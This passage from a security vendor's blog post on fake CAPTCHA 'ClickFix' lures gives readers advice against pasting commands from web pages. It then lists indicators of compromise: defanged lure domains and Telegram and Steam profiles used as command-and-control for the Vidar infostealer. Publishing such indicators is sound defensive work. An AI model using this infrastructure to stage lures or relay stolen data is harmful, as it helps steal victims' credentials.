  • Never run commands from untrusted sources. A legitimate website should never require you to press Win+R, open Terminal, or paste commands into PowerShell just to verify you are human. If a page asks you to do this, treat it as suspicious.
  • Verify instructions independently. If a website tells you to execute a command or perform a technical action, check official documentation or contact support through trusted channels before doing anything.
  • Be cautious with copy and paste. Some attacks hide malicious commands in copied text. If you ever need to run a command from documentation, typing it manually can help reduce the risk of running hidden code.
  • Protect your device. Keep your operating system and browser updated and use security software that can block malicious websites and detect infostealer malware.
  • Stay informed. Techniques like fake CAPTCHA pages and ClickFix attacks continue to evolve. Knowing that attackers may try to trick you into running commands yourself can help you spot these scams before they succeed.

Pro tip: The free Malwarebytes Browser Guard extension can warn you if a website attempts to copy content to your clipboard, which may help prevent this type of attack.

Indicators of Compromise (IOCs)

Domains

  • cdnwoopress[.]com: Fake CAPTCHA Infrastructure
  • woopresscdn[.]com: Fake CAPTCHA Infrastructure
  • walwood[.]be: Fake CAPTCHA Infrastructure
  • telegram[.]me/dikkh0k: Vidar C2
  • telegram[.]me/pr55ii: Vidar C2
  • steamcommunity[.]com/profiles/76561198742377525: Vidar C2
  • steamcommunity[.]com/profiles/76561198735736086: Vidar C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

❌